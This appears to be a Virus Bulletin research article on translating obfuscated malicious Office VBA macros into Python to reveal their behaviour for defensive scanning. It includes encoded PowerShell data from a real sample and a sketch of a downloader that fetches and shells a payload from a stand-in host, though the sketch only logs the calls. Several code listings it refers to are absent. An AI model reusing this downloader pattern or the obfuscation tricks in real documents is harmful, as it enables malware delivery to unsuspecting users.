Run Your Malicious VBA Anywhere
Covering the
global threat landscape
INTRODUCTION
Obfuscation is an old trick that every malware researcher and scanning engine has to get past in order to find the real content of
the sample being analysed. The type and level of obfuscation vary, but in general the idea is to make it difficult to understand
what a sample is really doing, which can reduce the accuracy with which it is handled.
Office documents have been used for decades to launch malware, often through macros, embedded content or exploits.
Embedded ‘executable’ content is usually very visible, and with most exploits, even if you don’t know exactly what is being
exploited, the presence of strange data in strange locations is usually a good giveaway that something is going on. The same is true
for hand-crafted RTFs with lots of obfuscation – they just shine in the dark.
I wanted to understand whether it’s possible to recompile VBA macros to another language, which could then easily be ‘run’ on
any gateway and thus reveal the sample’s true nature in a safe manner. Documents do have some privacy concerns, and being
able to carry out a full analysis of any (malicious) document on e.g. an email server inline with something that is light, accurate,
inexpensive and flexible could help improve the accuracy and time taken to make decisions. Regular sandbox solutions that require
Windows, Office, monitoring agents and quite a bit of hardware are neither light nor inexpensive.
APRIL 2021 1
VIRUS BULLETIN www.virusbulletin.com
This is a very simple sample and it wouldn’t take a lot of time to convert it manually to Python 3.x. As you’ll find out, manual
conversion and automatic conversion are two completely different things, but you need to start somewhere.
There are no arrays, complex equations, predefined variables or classes, divides that cause incompatibility with Python, etc. Here
you see some variables being defined, two objects being created and used (download and store), and at the end something is being
executed via Shell.
When this is auto-converted to Python 3.x it looks like this:
As you can see, it’s a simple downloader – but you saw that already with the initial VBA macro code as it wasn’t obfuscated much.
This was just a warm-up. The output of a run is simply the application-world, which stands in for Office as far as the sample is
concerned, printing out the behaviour it wants to report.
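The application-world idea can be illustrated with a small sketch. Everything in it is hypothetical and is not the generated code from the project: the `AppWorld` and `RecordedObject` names, the ProgIDs, the file path and the `example.invalid` URL are assumptions chosen for illustration. The stub plays the role of Office for the converted macro and records what the macro asks for instead of doing it.

```python
class RecordedObject:
    """Stand-in for a COM object: every method call is logged, never executed."""

    def __init__(self, progid, log):
        self._progid = progid
        self._log = log

    def __getattr__(self, method):
        # Only reached for names that are not real attributes, i.e. COM methods.
        def call(*args):
            rendered = ", ".join(repr(a) for a in args)
            self._log.append(f"{self._progid}.{method}({rendered})")
        return call


class AppWorld:
    """Hypothetical application-world: pretends to be Office, reports behaviour."""

    def __init__(self):
        self.log = []

    def CreateObject(self, progid):
        self.log.append(f"CreateObject({progid!r})")
        return RecordedObject(progid, self.log)

    def Shell(self, command, window_style=0):
        self.log.append(f"Shell({command!r})")


def converted_macro(app):
    """Assumed shape of a converted downloader macro (illustrative only)."""
    url = "http://example.invalid/payload.exe"
    target = "C:\\Temp\\payload.exe"
    http = app.CreateObject("MSXML2.XMLHTTP")   # download object
    http.Open("GET", url, False)
    http.Send()
    stream = app.CreateObject("ADODB.Stream")   # store object
    stream.SaveToFile(target, 2)
    app.Shell(target)                           # execution is logged, not performed


app = AppWorld()
converted_macro(app)
for entry in app.log:
    print(entry)
```

Because nothing is downloaded, written or executed, a stub like this can run on any platform that has a Python interpreter; the log is the analysis result.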
Sample 2 (e4debf873d683a51626882ba69364b54e5881799) will let us start removing obfuscation. The Workbook_Open macro of
this sample starts like this:
As you can see, the Select Case statements look a bit funky (I had to read them a few times before I realized what the code was
trying to do), but if you take a closer look at the variable being selected on (m222371a95aa9d8), it’s initially set to 3, so this
‘Case’ is the only one you need. Of course, you don’t know if ‘that is always the case’, so you port all the code to Python, always.
The extra branches are there only to confuse an algorithm or a human.
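A minimal sketch of how such a construct might be carried over, assuming a straightforward if/elif translation; the branch bodies and the `workbook_open` name are placeholders, not the sample's real code. Every branch is ported, and running the code decides which one matters.

```python
def workbook_open():
    """Illustrative port of an obfuscated Select Case; bodies are placeholders."""
    trace = []
    selector = 3  # mirrors m222371a95aa9d8 being initialised to 3

    # All cases are translated, even though only one is reachable at run time.
    if selector == 1:
        trace.append("case 1: decoy")
    elif selector == 2:
        trace.append("case 2: decoy")
    elif selector == 3:
        trace.append("case 3: create object, call Exec")
    else:
        trace.append("case else: decoy")
    return trace


print(workbook_open())
```

The converter does not need to prove which branches are dead; executing the translated code answers that question for free.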
Case 3 just creates a specific object based on an encrypted string – decrypted via function rd165a9f386b4b. Once this object is
created, it wants to execute the Exec method of the object. To find out what it wants to execute, it spawns the same decryption
function (rd165a9f386b4b) with data from a specific Excel cell:
index,name,row,col,value
1,ZAOIQ,6,134,"8281897784857A777E7E40778A77323F897B8076818985868B7E77327A7B76767780323F8081828481787B7E77323F578
A777587867B818062817E7B758B3264777F818677657B798077761F1C78878075867B818032804645787877328D1F1C827384737F3A367A7
3467878743B1F1C3685454548......
To find the cell information you need to enumerate the Workbook stream and look for records like:
• Formula: to get the parsed expressions of code running.
• SST/extSST: to find strings and their locations in the sheets.
• LabelSst/Lbl: to find labels used in Formula parsed expressions.
• Dimension handler: to find the sheet dimensions used.
• Rk and MulRk: to find integers and floats and their locations in the sheets.
After all these are parsed you will have a good map which is provided via the Excel object-model to the VBA/XF code.
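The enumeration step can be sketched as follows. This is a simplified illustration, not the project's parser: it assumes the Workbook stream has already been extracted as bytes, it ignores Continue records and substream boundaries, and it decodes only RK cells. The record identifiers are those given in the MS-XLS specification; the helper names and the demo data are made up.

```python
import struct

# Record type identifiers as listed in the MS-XLS (BIFF8) specification.
RECORD_NAMES = {
    0x0006: "Formula",
    0x0018: "Lbl",
    0x00BD: "MulRk",
    0x00FC: "SST",
    0x00FD: "LabelSst",
    0x00FF: "ExtSST",
    0x0200: "Dimensions",
    0x027E: "RK",
}


def iter_records(stream):
    """Yield (type, payload) for each record: 2-byte type, 2-byte size, payload."""
    offset = 0
    while offset + 4 <= len(stream):
        rec_type, size = struct.unpack_from("<HH", stream, offset)
        payload = stream[offset + 4:offset + 4 + size]
        if len(payload) < size:
            break  # truncated record: stop rather than guess
        yield rec_type, payload
        offset += 4 + size


def decode_rk(rk):
    """Decode a 32-bit RkNumber into an int or a float."""
    if rk & 0x02:  # fInt: the upper 30 bits hold a signed integer
        value = struct.unpack("<i", struct.pack("<I", rk))[0] >> 2
    else:          # the upper 30 bits are the top of an IEEE 754 double
        value = struct.unpack("<d", struct.pack("<Q", (rk & 0xFFFFFFFC) << 32))[0]
    return value / 100 if rk & 0x01 else value  # fX100: stored value is x100


def map_rk_cells(stream):
    """Build a {(row, col): value} map from the RK records in the stream."""
    cells = {}
    for rec_type, payload in iter_records(stream):
        if rec_type == 0x027E and len(payload) >= 10:
            row, col, _xf, rk = struct.unpack_from("<HHHI", payload)
            cells[(row, col)] = decode_rk(rk)
    return cells


# Synthetic stream (not from a real sample): two RK cells holding 3 and 1.5.
demo = (struct.pack("<HHHHHI", 0x027E, 10, 0, 0, 0, (3 << 2) | 0x02)
        + struct.pack("<HHHHHI", 0x027E, 10, 1, 0, 0, 0x3FF80000))
names = [RECORD_NAMES.get(t, hex(t)) for t, _ in iter_records(demo)]
print(names, map_rk_cells(demo))
```

A full map would add handlers for the other record types in the same loop, with the SST handler supplying the strings that LabelSst cells point to.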
Once it gets the data (above) it calls the decryption function:
This is nothing fancy: it reads two characters at a time and converts them to integers so they can be manipulated and then converted
back to characters and appended to the destination string. The beautiful consequence of converting the code and running it is that
you don’t really care how it works internally; you just want to know its effect.
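A routine of this shape can be sketched in a few lines. The actual body of rd165a9f386b4b is not reproduced here, so the manipulation step is an assumption: subtracting 0x12 from each byte happens to turn the visible start of the cell value into readable text, and the sample's real function may do more than that. The name `decode_hex_shift` is made up for the example.

```python
def decode_hex_shift(cell_value, shift=0x12):
    """Decode a hex string two characters at a time, subtracting a fixed shift.

    The shift of 0x12 is inferred from the visible prefix of the cell data,
    not taken from the sample's own decryption function.
    """
    out = []
    for i in range(0, len(cell_value) - 1, 2):
        code = int(cell_value[i:i + 2], 16)   # two hex characters -> integer
        out.append(chr((code - shift) % 256)) # manipulate, then back to a character
    return "".join(out)


# First 28 hex characters of the cell value shown above.
prefix = "8281897784857A777E7E40778A77"
print(decode_hex_shift(prefix))  # powershell.exe
```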
Once the entire VBA macro is converted to Python 3.x and run, you get the following output:
The object it wanted to create was Wscript.Shell, and the .Exec method was spawning a PowerShell script, which also has its own
encryption.
Sample 3 (ddcbcf91d98ac04ffbc90ff597bab6263c69eded) again raises some issues when you want to convert the code
automagically to Python. This time it looks like there is a lot of data waiting to be decrypted, but it’s not there. Once again, this is
to confuse humans and algorithms trying to decode or x-ray ‘data’.
You’ll see a lot of variables being set to ‘random’ data, which you might assume will be decrypted at some point. Instead, a
function, KC_U, is invoked further into the Workbook_Open macro, which looks like this:
A TxO record in the Workbook stream seems to follow an MsoDrawing object, and the Obj record describing this uses type
0x19 (Note) to Obj 1.
In the Python 3 world, the function KC_U will look like this (with the @goto support):
When, at the end, we run the generated Python 3 code, we get the behaviour of the VBA macro spelled out:
Before the real classes are defined for the VBA macro streams, Python needs to know about them for the first pass (it doesn’t have
to understand what they are, just know that they are there) and UserForm classes (if applicable) need to be created and initialized.
This is an example of a complete rewritten simple VBA macro in Python 3.x form:
CONCLUSIONS
After quite a few hours spent on this ‘fun’ project I’ve learned a lot of lessons. Languages are complicated and moving the same
logic from one language to another can’t be done in a hurry.
Let me run through a few of the challenges:
• Arrays in VBA aren’t indexed with ‘[’ – you’ll need to figure out what variable is being referenced and its size to determine if
a ‘[’ is needed for the Python world.
• Calculations that VBA handles fine as double/floats even though they are stored in Long will cause problems in Python when
you want to slice something based on a double/float. You’ll need to find the right time and place to convert it to an int(). Not
too soon, as it might affect the calculation/result (which could cause out-of-bounds access), and not too late.
• Calling subroutines and certain APIs in VBA doesn’t require ‘()’ around parameters – you’ll need to figure out what is what.
• Referencing local variables when they are in a Python class means some ‘self.’ references need to be inserted so you always
reference the right object. You also need to declare global variables, so that e.g. UserForm access always goes through
the same expected object.
• I wrote two tokenizers for each line in order to handle ‘complicated’ expressions, e.g. is this a function call, and if so, where
do we insert the ‘()’ for the parameters?
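The float-versus-int challenge from the list above can be illustrated with a hypothetical `vba_mid` helper that stands in for VBA's Mid. It is a sketch under one stated assumption: that VBA's implicit Double-to-Long coercion rounds half to even, as CLng does, so Python's `round()` is used rather than a bare `int()`, which truncates. The conversion is applied only at the point of slicing, so earlier arithmetic keeps its fractional part.

```python
def vba_to_long(value):
    """Coerce a number the way VBA is assumed to: round half to even."""
    return int(round(value))


def vba_mid(text, start, length=None):
    """Hypothetical stand-in for VBA's Mid(text, start[, length]) with 1-based start."""
    start_index = vba_to_long(start)  # convert as late as possible
    if start_index < 1:
        raise ValueError("Mid start must be at least 1")
    begin = start_index - 1           # VBA is 1-based, Python slices are 0-based
    if length is None:
        return text[begin:]
    return text[begin:begin + vba_to_long(length)]


position = 7 / 2                         # 3.5, a float in Python
print(vba_mid("abcdef", position, 2))    # de (3.5 rounds to 4)
print("abcdef"[int(position) - 1:][:2])  # cd (truncating to 3 picks a different slice)
```

The two printed results differ, which is the kind of silent divergence that makes the timing and method of the conversion matter.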
Application.Run is a call to the application-world to run XF code from the sheet ‘Brisk’ from the ‘CD5’ location. This means the
‘Run’ function will need to translate the XF code to Python as well, and this will be the next project.
These lessons account for many of the issues faced, and the rest is pain as you go. Still, the initial results, and the fact that
a few milliseconds are all that is needed to run malicious VBA macros on any platform, give me confidence that this could
be useful in many situations and is worth the hours spent.
REFERENCES
[1] https://pypi.org/project/goto-statement/.
[2] https://libnotfound.com/2021/03/24/automatically-generate-python-3-x-from-malicious-vba-macros/.
[3] https://libnotfound.com/2021/03/10/running-vba-as-python-part-2/.